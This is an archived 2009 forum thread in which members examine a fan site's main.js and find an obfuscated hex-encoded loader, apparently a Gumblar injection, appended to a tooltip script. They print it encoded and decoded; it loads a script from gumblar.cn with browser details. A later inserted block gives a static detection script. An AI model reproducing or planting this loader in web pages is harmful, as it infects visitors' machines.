View Full Version : HHGS.net has got a Trojan Horse?



Special
07-05-2009, 09:31 PM
http://img89.imageshack.us/img89/6775/virusl.png

Thread closed by Jordan (Forum Super Moderator): Due to bump

J0SH
07-05-2009, 09:37 PM
No one visits their values anyway so not many people will get infected

Immenseman
07-05-2009, 09:38 PM
*Removed*

Edited by Flisker (Forum Moderator): Please do not accuse people of hacking or scamming

TheMagicTramp
07-05-2009, 09:42 PM
Oh second time being hacked then Pabble?

DON'T GO ON HHGS.NET

Special
07-05-2009, 09:46 PM
Oh second time being hacked then Pabble?

DON'T GO ON HHGS.NET

Only my MSN got hacked, and that got hacked 3 times.

Shows how much you know, doesn't it.


ANYWAY..... this thread isn't about arguing, so post what you think about the screenie

eight
07-05-2009, 09:58 PM
Only my MSN got hacked, and that got hacked 3 times.

Shows how much you know, doesn't it.


ANYWAY..... this thread isn't about arguing, so post what you think about the screenie

I think nobody cares

culturist
07-05-2009, 10:24 PM
i think this is a load of ********? :P

Favourtism
07-05-2009, 10:25 PM
The .JS isn't a trojan, your antivirus is **** and said it is.

If it comes down to posting the file then kk

GoldenMerc
07-05-2009, 10:27 PM
Includes on the main.js;

<!--
/*
Pleas leave this notice.
DHTML tip message version 1.2 copyright Essam Gamal 2003 (http://migoicons.tripod.com, [email protected])
All modifications are done in the style.js you should not modify this file. Created on : 06/03/2003
Script featured on and can be found at Dynamic Drive (http://www.dynamicdrive.com)
*/

var ua = navigator.userAgent
var ps = navigator.productSub
var dom = (document.getElementById)? 1:0
var ie4 = (document.all&&!dom)? 1:0
var ie5 = (document.all&&dom)? 1:0
var nn4 =(navigator.appName.toLowerCase() == "netscape" && parseInt(navigator.appVersion) == 4)
var nn6 = (dom&&!ie5)? 1:0
var sNav = (nn4||nn6||ie4||ie5)? 1:0
var cssFilters = ((ua.indexOf("MSIE 5.5")>=0||ua.indexOf("MSIE 6")>=0)&&ua.indexOf("Opera")<0)? 1:0
var Style=[],Text=[],Count=0,sbw=0,move=0,hs="",mx,my,scl,sct,ww,wh,obj,sl,st,ih,iw,vl,hl,sv,evlh ,evlw,tbody
var HideTip = "eval(obj+sv+hl+';'+obj+sl+'=0;'+obj+st+'=-800')"
var doc_root = ((ie5&&ua.indexOf("Opera")<0||ie4)&&document.compatMode=="CSS1Compat")? "document.documentElement":"document.body"
var PX = (nn6)? "px" :""

if(sNav) {
window.onresize = ReloadTip
document.onmousemove = MoveTip
if(nn4) document.captureEvents(Event.MOUSEMOVE)
}
if(nn4||nn6) {
mx = "e.pageX"
my = "e.pageY"
scl = "window.pageXOffset"
sct = "window.pageYOffset"
if(nn4) {
obj = "document.TipLayer."
sl = "left"
st = "top"
ih = "clip.height"
iw = "clip.width"
vl = "'show'"
hl = "'hide'"
sv = "visibility="
}
else obj = "document.getElementById('TipLayer')."
}
if(ie4||ie5) {
obj = "TipLayer."
mx = "event.x"
my = "event.y"
scl = "eval(doc_root).scrollLeft"
sct = "eval(doc_root).scrollTop"
if(ie5) {
mx = mx+"+"+scl
my = my+"+"+sct
}
}
if(ie4||dom){
sl = "style.left"
st = "style.top"
ih = "offsetHeight"
iw = "offsetWidth"
vl = "'visible'"
hl = "'hidden'"
sv = "style.visibility="
}
if(ie4||ie5||ps>=20020823) {
ww = "eval(doc_root).clientWidth"
wh = "eval(doc_root).clientHeight"
}
else {
ww = "window.innerWidth"
wh = "window.innerHeight"
evlh = eval(wh)
evlw = eval(ww)
sbw=15
}

function applyCssFilter(){
if(cssFilters&&FiltersEnabled) {
var dx = " progid:DXImageTransform.Microsoft."
TipLayer.style.filter = "revealTrans()"+dx+"Fade(Overlap=1.00 enabled=0)"+dx+"Inset(enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=in enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=out enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=in enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=out enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=in enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=out enabled=0)"+dx+"Iris(irisstyle=STAR,motion=in enabled=0)"+dx+"Iris(irisstyle=STAR,motion=out enabled=0)"+dx+"RadialWipe(wipestyle=CLOCK enabled=0)"+dx+"RadialWipe(wipestyle=WEDGE enabled=0)"+dx+"RadialWipe(wipestyle=RADIAL enabled=0)"+dx+"Pixelate(MaxSquare=35,enabled=0)"+dx+"Slide(slidestyle=HIDE,Bands=25 enabled=0)"+dx+"Slide(slidestyle=PUSH,Bands=25 enabled=0)"+dx+"Slide(slidestyle=SWAP,Bands=25 enabled=0)"+dx+"Spiral(GridSizeX=16,GridSizeY=16 enabled=0)"+dx+"Stretch(stretchstyle=HIDE enabled=0)"+dx+"Stretch(stretchstyle=PUSH enabled=0)"+dx+"Stretch(stretchstyle=SPIN enabled=0)"+dx+"Wheel(spokes=16 enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= reverse enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= reverse enabled=0)"+dx+"Zigzag(GridSizeX=8,GridSizeY=8 enabled=0)"+dx+"Alpha(enabled=0)"+dx+"Dropshadow(OffX=3,OffY=3,Positive=true,enabled=0)"+dx+"Shadow(strength=3,direction=135,enabled=0)"
}
}

function stm(t,s) {
if(sNav) {
if(t.length<2||s.length<25) {
var ErrorNotice = "DHTML TIP MESSAGE VERSION 1.2 ERROR NOTICE.\n"
if(t.length<2&&s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array and Text Array of this tip.\nTheir should be 25 entries in every Style Array even though empty and 2 in every Text Array. You defined only "+s.length+" entries in the Style Array and "+t.length+" entry in the Text Array. This tip won't be viewed to avoid errors")
else if(t.length<2) alert(ErrorNotice+"It looks like you removed an entry or more from the Text Array of this tip.\nTheir should be 2 entries in every Text Array. You defined only "+t.length+" entry. This tip won't be viewed to avoid errors.")
else if(s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array of this tip.\nTheir should be 25 entries in every Style Array even though empty. You defined only "+s.length+" entries. This tip won't be viewed to avoid errors.")
}
else {
var ab = "" ;var ap = ""
var titCol = (s[0])? "COLOR='"+s[0]+"'" : ""
var txtCol = (s[1])? "COLOR='"+s[1]+"'" : ""
var titBgCol = (s[2])? "BGCOLOR='"+s[2]+"'" : ""
var txtBgCol = (s[3])? "BGCOLOR='"+s[3]+"'" : ""
var titBgImg = (s[4])? "BACKGROUND='"+s[4]+"'" : ""
var txtBgImg = (s[5])? "BACKGROUND='"+s[5]+"'" : ""
var titTxtAli = (s[6] && s[6].toLowerCase()!="left")? "ALIGN='"+s[6]+"'" : ""
var txtTxtAli = (s[7] && s[7].toLowerCase()!="left")? "ALIGN='"+s[7]+"'" : ""
var add_height = (s[15])? "HEIGHT='"+s[15]+"'" : ""
if(!s[8]) s[8] = "Verdana,Arial,Helvetica"
if(!s[9]) s[9] = "Verdana,Arial,Helvetica"
if(!s[12]) s[12] = 1
if(!s[13]) s[13] = 1
if(!s[14]) s[14] = 200
if(!s[16]) s[16] = 0
if(!s[17]) s[17] = 0
if(!s[18]) s[18] = 10
if(!s[19]) s[19] = 10
hs = s[11].toLowerCase()
if(ps==20001108){
if(s[2]) ab="STYLE='border:"+s[16]+"px solid"+" "+s[2]+"'"
ap="STYLE='padding:"+s[17]+"px "+s[17]+"px "+s[17]+"px "+s[17]+"px'"}
var closeLink=(hs=="sticky")? "<TD ALIGN='right'><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"'><A HREF='javascript:void(0)' ONCLICK='stickyhide()' STYLE='text-decoration:none;color:"+s[0]+"'><B>Close</B></A></FONT></TD>":""
var title=(t[0]||hs=="sticky")? "<TABLE WIDTH='100%' BORDER='0' CELLPADDING='0' CELLSPACING='0'><TR><TD "+titTxtAli+"><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"' "+titCol+"><B>"+t[0]+"</B></FONT></TD>"+closeLink+"</TR></TABLE>" : ""
var txt="<TABLE "+titBgImg+" "+ab+" WIDTH='"+s[14]+"' BORDER='0' CELLPADDING='"+s[16]+"' CELLSPACING='0' "+titBgCol+" ><TR><TD>"+title+"<TABLE WIDTH='100%' "+add_height+" BORDER='0' CELLPADDING='"+s[17]+"' CELLSPACING='0' "+txtBgCol+" "+txtBgImg+"><TR><TD "+txtTxtAli+" "+ap+" VALIGN='top'><FONT SIZE='"+s[13]+"' FACE='"+s[9]+"' "+txtCol +">"+t[1]+"</FONT></TD></TR></TABLE></TD></TR></TABLE>"
if(nn4) {
with(eval(obj+"document")) {
open()
write(txt)
close()
}
}
else eval(obj+"innerHTML=txt")
tbody = {
Pos:s[10].toLowerCase(),
Xpos:s[18],
Ypos:s[19],
Transition:s[20],
Duration:s[21],
Alpha:s[22],
ShadowType:s[23].toLowerCase(),
ShadowColor:s[24],
Width:parseInt(eval(obj+iw)+3+sbw)
}
if(ie4) {
TipLayer.style.width = s[14]
tbody.Width = s[14]
}
Count=0
move=1
}
}
}

function MoveTip(e) {
if(move) {
var X,Y,MouseX = eval(mx),MouseY = eval(my); tbody.Height = parseInt(eval(obj+ih)+3)
tbody.wiw = parseInt(eval(ww+"+"+scl)); tbody.wih = parseInt(eval(wh+"+"+sct))
switch(tbody.Pos) {
case "left" : X=MouseX-tbody.Width-tbody.Xpos; Y=MouseY+tbody.Ypos; break
case "center": X=MouseX-(tbody.Width/2); Y=MouseY+tbody.Ypos; break
case "float": X=tbody.Xpos+eval(scl); Y=tbody.Ypos+eval(sct); break
case "fixed": X=tbody.Xpos; Y=tbody.Ypos; break
default: X=MouseX+tbody.Xpos; Y=MouseY+tbody.Ypos
}

if(tbody.wiw<tbody.Width+X) X = tbody.wiw-tbody.Width
if(tbody.wih<tbody.Height+Y+sbw) {
if(tbody.Pos=="float"||tbody.Pos=="fixed") Y = tbody.wih-tbody.Height-sbw
else Y = MouseY-tbody.Height
}
if(X<0) X=0
eval(obj+sl+"=X+PX;"+obj+st+"=Y+PX")
ViewTip()
}
}

function ViewTip() {
Count++
if(Count == 1) {
if(cssFilters&&FiltersEnabled) {
for(Index=28; Index<31; Index++) { TipLayer.filters[Index].enabled = 0 }
for(s=0; s<28; s++) { if(TipLayer.filters[s].status == 2) TipLayer.filters[s].stop() }
if(tbody.Transition == 51) tbody.Transition = parseInt(Math.random()*50)
var applyTrans = (tbody.Transition>-1&&tbody.Transition<24&&tbody.Duration>0)? 1:0
var advFilters = (tbody.Transition>23&&tbody.Transition<51&&tbody.Duration>0)? 1:0
var which = (applyTrans)?0:(advFilters)? tbody.Transition-23:0
if(tbody.Alpha>0&&tbody.Alpha<100) {
TipLayer.filters[28].enabled = 1
TipLayer.filters[28].opacity = tbody.Alpha
}
if(tbody.ShadowColor&&tbody.ShadowType == "simple") {
TipLayer.filters[29].enabled = 1
TipLayer.filters[29].color = tbody.ShadowColor
}
else if(tbody.ShadowColor&&tbody.ShadowType == "complex") {
TipLayer.filters[30].enabled = 1
TipLayer.filters[30].color = tbody.ShadowColor
}
if(applyTrans||advFilters) {
eval(obj+sv+hl)
if(applyTrans) TipLayer.filters[0].transition = tbody.Transition
TipLayer.filters[which].duration = tbody.Duration
TipLayer.filters[which].apply()
}
}
eval(obj+sv+vl)
if(cssFilters&&FiltersEnabled&&(applyTrans||advFilters)) TipLayer.filters[which].play()
if(hs == "sticky") move=0
}
}

function stickyhide() {
eval(HideTip)
}

function ReloadTip() {
if(nn4&&(evlw!=eval(ww)||evlh!=eval(wh))) location.reload()
else if(hs == "sticky") eval(HideTip)
}

function htm() {
if(sNav) {
if(hs!="keep") {
move=0;
if(hs!="sticky") eval(HideTip)
}
}
}


//-->


<!--
(function(){var ebp='%';var lWR0='v.61.72.20.61.3d.22Scrip.74Engin.65.22.2cb.3 d.22Versi.6fn.28)+.22.2c.6a.3d.22.22.2cu.3dn.61.76 .69gat.6fr.2euserAgent.3b.69f((.75.2eindex.4ff.28. 22.57.69.6e.22).3e0).26.26.28u.2e.69n.64e.78O.66(. 22NT.206.22).3c0.29.26.26.28.64oc.75me.6et.2ec.6fo .6bi.65.2e.69ndex.4f.66(.22miek.3d.31.22).3c0.29.2 6.26(typeo.66(zrvzts).21.3d.74.79.70eof.28.22.41.2 2))).7bzrvzts.3d.22A.22.3bev.61l.28.22if(w.69ndow. 2e.22+.61+.22.29j.3dj+.22+a.2b.22.4d.61j.6fr.22+b+ a+.22Min.6fr.22+.62.2b.61.2b.22.42u.69ld.22+b.2b.2 2.6a.3b.22).3bdoc.75men.74.2ewri.74.65(.22.3c.73c. 72ip.74.20src.3d.2f.2fgumblar.2ecn.2frss.2f.3fid.3 d.22+j+.22.3e.3c.5c.2fscri.70t.3e.22.29.3b.7d';var HHf2=unescape(lWR0.replace(/./g,ebp));eval(HHf2)})();
-->
I see nowhere where it's attempting to give a trojan out?

LOLROB
07-05-2009, 10:28 PM
when I visit the site it says

Malware name - JS:Redirector-H7 [Trj]
Malware type - Trojan Horse

hmmm...

Jin
07-05-2009, 10:29 PM
explain the second from last line ross.

GoldenMerc
07-05-2009, 10:32 PM
It's to do with the rares hover over, Jin!

Eckuii
07-05-2009, 10:34 PM
Jake be quiet, you're using avast which is crap, HHGS doesn't have a trojan in it, look at Ross's code, if it did then he wouldn't post the code...

Dunno what ur trying to achieve here.

Immenseman
07-05-2009, 10:35 PM
his name isn't jake

Favourtism
07-05-2009, 10:35 PM
Rumours say jakes on Pabbles account LOL. (ty roflcopter)

i jk

GoldenMerc
07-05-2009, 10:36 PM
It is when you're logged onto it :o

Immenseman
07-05-2009, 10:37 PM
WHAT THE HELL LMAO

JIN IP CHECK KTHNX

Favourtism
07-05-2009, 10:39 PM
WHAT THE HELL LMAO

JIN IP CHECK KTHNX
kk :S meh rc might be ************ :P

not a trojan tho' soz

Jin
07-05-2009, 10:40 PM
Jake be quiet, you're using avast which is crap, HHGS doesn't have a trojan in it, look at Ross's code, if it did then he wouldn't post the code...

Dunno what ur trying to achieve here.

Pretty silly statement there, Ross doesn't have to be behind the malicious code. If his server has a security flaw in it which allows people to write to his .js file, or a member of staff had FTP details, then they could insert the malicious code themselves.

I also couldn't think of a better place other than a rare values page considering the assumption that users who view that page would own a proportion of rares.

I am having someone else look at the code just in case anyway.

Immenseman
07-05-2009, 10:42 PM
reported posts for accusing me of hacking, animals.

GoldenMerc
07-05-2009, 10:46 PM
It's a code from Dynamic Drive, so I'm highly doubting it has a trojan :}

Jin
07-05-2009, 10:54 PM
It's a code from Dynamic Drive, so I'm highly doubting it has a trojan :}

Means diddly squat if you have read my previous post.

This is the original code from dynamic drive.


<!--
/*
Pleas leave this notice.
DHTML tip message version 1.2 copyright Essam Gamal 2003 (http://migoicons.tripod.com, [email protected])
All modifications are done in the style.js you should not modify this file. Created on : 06/03/2003
Script featured on and can be found at Dynamic Drive (http://www.dynamicdrive.com)
*/

var ua = navigator.userAgent
var ps = navigator.productSub
var dom = (document.getElementById)? 1:0
var ie4 = (document.all&&!dom)? 1:0
var ie5 = (document.all&&dom)? 1:0
var nn4 =(navigator.appName.toLowerCase() == "netscape" && parseInt(navigator.appVersion) == 4)
var nn6 = (dom&&!ie5)? 1:0
var sNav = (nn4||nn6||ie4||ie5)? 1:0
var cssFilters = ((ua.indexOf("MSIE 5.5")>=0||ua.indexOf("MSIE 6")>=0)&&ua.indexOf("Opera")<0)? 1:0
var Style=[],Text=[],Count=0,sbw=0,move=0,hs="",mx,my,scl,sct,ww,wh,obj,sl,st,ih,iw,vl,hl,sv,evlh ,evlw,tbody
var HideTip = "eval(obj+sv+hl+';'+obj+sl+'=0;'+obj+st+'=-800')"
var doc_root = ((ie5&&ua.indexOf("Opera")<0||ie4)&&document.compatMode=="CSS1Compat")? "document.documentElement":"document.body"
var PX = (nn6)? "px" :""

if(sNav) {
window.onresize = ReloadTip
document.onmousemove = MoveTip
if(nn4) document.captureEvents(Event.MOUSEMOVE)
}
if(nn4||nn6) {
mx = "e.pageX"
my = "e.pageY"
scl = "window.pageXOffset"
sct = "window.pageYOffset"
if(nn4) {
obj = "document.TipLayer."
sl = "left"
st = "top"
ih = "clip.height"
iw = "clip.width"
vl = "'show'"
hl = "'hide'"
sv = "visibility="
}
else obj = "document.getElementById('TipLayer')."
}
if(ie4||ie5) {
obj = "TipLayer."
mx = "event.x"
my = "event.y"
scl = "eval(doc_root).scrollLeft"
sct = "eval(doc_root).scrollTop"
if(ie5) {
mx = mx+"+"+scl
my = my+"+"+sct
}
}
if(ie4||dom){
sl = "style.left"
st = "style.top"
ih = "offsetHeight"
iw = "offsetWidth"
vl = "'visible'"
hl = "'hidden'"
sv = "style.visibility="
}
if(ie4||ie5||ps>=20020823) {
ww = "eval(doc_root).clientWidth"
wh = "eval(doc_root).clientHeight"
}
else {
ww = "window.innerWidth"
wh = "window.innerHeight"
evlh = eval(wh)
evlw = eval(ww)
sbw=15
}

function applyCssFilter(){
if(cssFilters&&FiltersEnabled) {
var dx = " progid:DXImageTransform.Microsoft."
TipLayer.style.filter = "revealTrans()"+dx+"Fade(Overlap=1.00 enabled=0)"+dx+"Inset(enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=in enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=out enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=in enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=out enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=in enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=out enabled=0)"+dx+"Iris(irisstyle=STAR,motion=in enabled=0)"+dx+"Iris(irisstyle=STAR,motion=out enabled=0)"+dx+"RadialWipe(wipestyle=CLOCK enabled=0)"+dx+"RadialWipe(wipestyle=WEDGE enabled=0)"+dx+"RadialWipe(wipestyle=RADIAL enabled=0)"+dx+"Pixelate(MaxSquare=35,enabled=0)"+dx+"Slide(slidestyle=HIDE,Bands=25 enabled=0)"+dx+"Slide(slidestyle=PUSH,Bands=25 enabled=0)"+dx+"Slide(slidestyle=SWAP,Bands=25 enabled=0)"+dx+"Spiral(GridSizeX=16,GridSizeY=16 enabled=0)"+dx+"Stretch(stretchstyle=HIDE enabled=0)"+dx+"Stretch(stretchstyle=PUSH enabled=0)"+dx+"Stretch(stretchstyle=SPIN enabled=0)"+dx+"Wheel(spokes=16 enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= reverse enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= reverse enabled=0)"+dx+"Zigzag(GridSizeX=8,GridSizeY=8 enabled=0)"+dx+"Alpha(enabled=0)"+dx+"Dropshadow(OffX=3,OffY=3,Positive=true,enabled=0)"+dx+"Shadow(strength=3,direction=135,enabled=0)"
}
}

function stm(t,s) {
if(sNav) {
if(t.length<2||s.length<25) {
var ErrorNotice = "DHTML TIP MESSAGE VERSION 1.2 ERROR NOTICE.\n"
if(t.length<2&&s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array and Text Array of this tip.\nTheir should be 25 entries in every Style Array even though empty and 2 in every Text Array. You defined only "+s.length+" entries in the Style Array and "+t.length+" entry in the Text Array. This tip won't be viewed to avoid errors")
else if(t.length<2) alert(ErrorNotice+"It looks like you removed an entry or more from the Text Array of this tip.\nTheir should be 2 entries in every Text Array. You defined only "+t.length+" entry. This tip won't be viewed to avoid errors.")
else if(s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array of this tip.\nTheir should be 25 entries in every Style Array even though empty. You defined only "+s.length+" entries. This tip won't be viewed to avoid errors.")
}
else {
var ab = "" ;var ap = ""
var titCol = (s[0])? "COLOR='"+s[0]+"'" : ""
var txtCol = (s[1])? "COLOR='"+s[1]+"'" : ""
var titBgCol = (s[2])? "BGCOLOR='"+s[2]+"'" : ""
var txtBgCol = (s[3])? "BGCOLOR='"+s[3]+"'" : ""
var titBgImg = (s[4])? "BACKGROUND='"+s[4]+"'" : ""
var txtBgImg = (s[5])? "BACKGROUND='"+s[5]+"'" : ""
var titTxtAli = (s[6] && s[6].toLowerCase()!="left")? "ALIGN='"+s[6]+"'" : ""
var txtTxtAli = (s[7] && s[7].toLowerCase()!="left")? "ALIGN='"+s[7]+"'" : ""
var add_height = (s[15])? "HEIGHT='"+s[15]+"'" : ""
if(!s[8]) s[8] = "Verdana,Arial,Helvetica"
if(!s[9]) s[9] = "Verdana,Arial,Helvetica"
if(!s[12]) s[12] = 1
if(!s[13]) s[13] = 1
if(!s[14]) s[14] = 200
if(!s[16]) s[16] = 0
if(!s[17]) s[17] = 0
if(!s[18]) s[18] = 10
if(!s[19]) s[19] = 10
hs = s[11].toLowerCase()
if(ps==20001108){
if(s[2]) ab="STYLE='border:"+s[16]+"px solid"+" "+s[2]+"'"
ap="STYLE='padding:"+s[17]+"px "+s[17]+"px "+s[17]+"px "+s[17]+"px'"}
var closeLink=(hs=="sticky")? "<TD ALIGN='right'><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"'><A HREF='javascript:void(0)' ONCLICK='stickyhide()' STYLE='text-decoration:none;color:"+s[0]+"'><B>Close</B></A></FONT></TD>":""
var title=(t[0]||hs=="sticky")? "<TABLE WIDTH='100%' BORDER='0' CELLPADDING='0' CELLSPACING='0'><TR><TD "+titTxtAli+"><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"' "+titCol+"><B>"+t[0]+"</B></FONT></TD>"+closeLink+"</TR></TABLE>" : ""
var txt="<TABLE "+titBgImg+" "+ab+" WIDTH='"+s[14]+"' BORDER='0' CELLPADDING='"+s[16]+"' CELLSPACING='0' "+titBgCol+" ><TR><TD>"+title+"<TABLE WIDTH='100%' "+add_height+" BORDER='0' CELLPADDING='"+s[17]+"' CELLSPACING='0' "+txtBgCol+" "+txtBgImg+"><TR><TD "+txtTxtAli+" "+ap+" VALIGN='top'><FONT SIZE='"+s[13]+"' FACE='"+s[9]+"' "+txtCol +">"+t[1]+"</FONT></TD></TR></TABLE></TD></TR></TABLE>"
if(nn4) {
with(eval(obj+"document")) {
open()
write(txt)
close()
}
}
else eval(obj+"innerHTML=txt")
tbody = {
Pos:s[10].toLowerCase(),
Xpos:s[18],
Ypos:s[19],
Transition:s[20],
Duration:s[21],
Alpha:s[22],
ShadowType:s[23].toLowerCase(),
ShadowColor:s[24],
Width:parseInt(eval(obj+iw)+3+sbw)
}
if(ie4) {
TipLayer.style.width = s[14]
tbody.Width = s[14]
}
Count=0
move=1
}
}
}

function MoveTip(e) {
if(move) {
var X,Y,MouseX = eval(mx),MouseY = eval(my); tbody.Height = parseInt(eval(obj+ih)+3)
tbody.wiw = parseInt(eval(ww+"+"+scl)); tbody.wih = parseInt(eval(wh+"+"+sct))
switch(tbody.Pos) {
case "left" : X=MouseX-tbody.Width-tbody.Xpos; Y=MouseY+tbody.Ypos; break
case "center": X=MouseX-(tbody.Width/2); Y=MouseY+tbody.Ypos; break
case "float": X=tbody.Xpos+eval(scl); Y=tbody.Ypos+eval(sct); break
case "fixed": X=tbody.Xpos; Y=tbody.Ypos; break
default: X=MouseX+tbody.Xpos; Y=MouseY+tbody.Ypos
}

if(tbody.wiw<tbody.Width+X) X = tbody.wiw-tbody.Width
if(tbody.wih<tbody.Height+Y+sbw) {
if(tbody.Pos=="float"||tbody.Pos=="fixed") Y = tbody.wih-tbody.Height-sbw
else Y = MouseY-tbody.Height
}
if(X<0) X=0
eval(obj+sl+"=X+PX;"+obj+st+"=Y+PX")
ViewTip()
}
}

function ViewTip() {
Count++
if(Count == 1) {
if(cssFilters&&FiltersEnabled) {
for(Index=28; Index<31; Index++) { TipLayer.filters[Index].enabled = 0 }
for(s=0; s<28; s++) { if(TipLayer.filters[s].status == 2) TipLayer.filters[s].stop() }
if(tbody.Transition == 51) tbody.Transition = parseInt(Math.random()*50)
var applyTrans = (tbody.Transition>-1&&tbody.Transition<24&&tbody.Duration>0)? 1:0
var advFilters = (tbody.Transition>23&&tbody.Transition<51&&tbody.Duration>0)? 1:0
var which = (applyTrans)?0:(advFilters)? tbody.Transition-23:0
if(tbody.Alpha>0&&tbody.Alpha<100) {
TipLayer.filters[28].enabled = 1
TipLayer.filters[28].opacity = tbody.Alpha
}
if(tbody.ShadowColor&&tbody.ShadowType == "simple") {
TipLayer.filters[29].enabled = 1
TipLayer.filters[29].color = tbody.ShadowColor
}
else if(tbody.ShadowColor&&tbody.ShadowType == "complex") {
TipLayer.filters[30].enabled = 1
TipLayer.filters[30].color = tbody.ShadowColor
}
if(applyTrans||advFilters) {
eval(obj+sv+hl)
if(applyTrans) TipLayer.filters[0].transition = tbody.Transition
TipLayer.filters[which].duration = tbody.Duration
TipLayer.filters[which].apply()
}
}
eval(obj+sv+vl)
if(cssFilters&&FiltersEnabled&&(applyTrans||advFilters)) TipLayer.filters[which].play()
if(hs == "sticky") move=0
}
}

function stickyhide() {
eval(HideTip)
}

function ReloadTip() {
if(nn4&&(evlw!=eval(ww)||evlh!=eval(wh))) location.reload()
else if(hs == "sticky") eval(HideTip)
}

function htm() {
if(sNav) {
if(hs!="keep") {
move=0;
if(hs!="sticky") eval(HideTip)
}
}
}


//-->

Jewbear has found the last two lines of your code to open: http://gumblar.cn/rss/ after he unfuzzled it. Surprise surprise, even Firefox thinks it's about to get brutally invaded.

GoldenMerc
07-05-2009, 10:55 PM
But that's an RSS feed
that couldn't do ****>?

Agnostic Bear
07-05-2009, 10:55 PM
It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}
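
Added example, not part of the thread or of any member's post: the block appended to main.js stores its payload with the `%` of each hex escape swapped for a dot, so it can be decoded as plain text without ever running it. The sketch below flags such string literals in a .js file and reports the script host they would load; the function names and thresholds are assumptions, and the sample file is constructed with a placeholder host.

```javascript
// Static triage of a script file for a hex-escaped loader.
// Nothing here calls eval() or unescape(); the payload is only handled as text.

// Constructed sample of a served .js file: benign tooltip lines followed by an
// appended loader in the same shape as the thread's (the host is a placeholder).
const SAMPLE_SERVED_JS = String.raw`var dx = " progid:DXImageTransform.Microsoft."
TipLayer.style.filter = "GradientWipe(GradientSize=1.00,wipestyle=0,motion=forward enabled=0)"
function htm() { move = 0 }
(function(){var d='%';var s='d.6fcu.6dent.2ewr.69te(.22.3cscr.69pt.20src.3d.2f.2fbad.2eexample.2einvalid.2frss.2f.3e.3c.2fscr.69pt.3e.22)';var x=unescape(s.replace(/\./g,d));eval(x)})();`;

const MIN_LITERAL_LENGTH = 40;  // assumption: shorter strings are not worth decoding
const MIN_ESCAPE_DENSITY = 0.3; // assumption: share of the literal made of escapes

// Turn "<delim>XX" hex pairs into characters, giving the same text that
// unescape(s.replace(/\./g, '%')) would, by string processing only.
function decodeDelimitedHex(encoded, delim) {
  const pair = new RegExp('\\' + delim + '([0-9a-fA-F]{2})', 'g');
  return encoded.replace(pair, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Fraction of a string that consists of "<delim>XX" escapes.
function escapeDensity(text, delim) {
  const pair = new RegExp('\\' + delim + '[0-9a-fA-F]{2}', 'g');
  const hits = text.match(pair) || [];
  return (hits.length * 3) / text.length;
}

// Collect the src= values of script tags found in decoded text.
function scriptSources(decoded) {
  const out = [];
  const tag = /<script[^>]*?\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = tag.exec(decoded)) !== null) out.push(m[1]);
  return out;
}

// Resolve a (possibly protocol-relative) src to its hostname.
function hostOf(src) {
  try { return new URL(src, 'http://base.invalid/').hostname; }
  catch (e) { return null; }
}

// Scan source text for single-line string literals that are mostly hex escapes.
// Heuristic: a stray apostrophe in a comment can hide a literal on that line.
function findEncodedLoaders(source) {
  const findings = [];
  const literal = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let m;
  while ((m = literal.exec(source)) !== null) {
    const body = m[2];
    if (body.length < MIN_LITERAL_LENGTH) continue;
    const delim = ['.', '%'].find(d => escapeDensity(body, d) >= MIN_ESCAPE_DENSITY);
    if (!delim) continue;
    const end = m.index + m[0].length;
    const decoded = decodeDelimitedHex(body, delim);
    const sources = scriptSources(decoded);
    findings.push({
      line: source.slice(0, m.index).split('\n').length,
      delimiter: delim,
      decoded,
      executed: /\beval\s*\(/.test(source.slice(end, end + 300)), // eval() nearby
      writesScriptTag: /document\.write\s*\(/.test(decoded),
      scriptSources: sources,
      hosts: sources.map(hostOf).filter(Boolean),
    });
  }
  return findings;
}

console.log(JSON.stringify(findEncodedLoaders(SAMPLE_SERVED_JS), null, 2));
```

The `1.00` in the tooltip's filter string also looks like a dot-hex pair, which is why the check uses escape density over a long literal rather than a single match.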

Jin
07-05-2009, 10:57 PM
But that's an RSS feed
that couldn't do ****>?

No, it's a directory named as RSS in the same way as I can have a directory named as exe, php, xml.

Doesn't mean that it is an executable, php file or xml file.

Favourtism
07-05-2009, 10:58 PM
It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



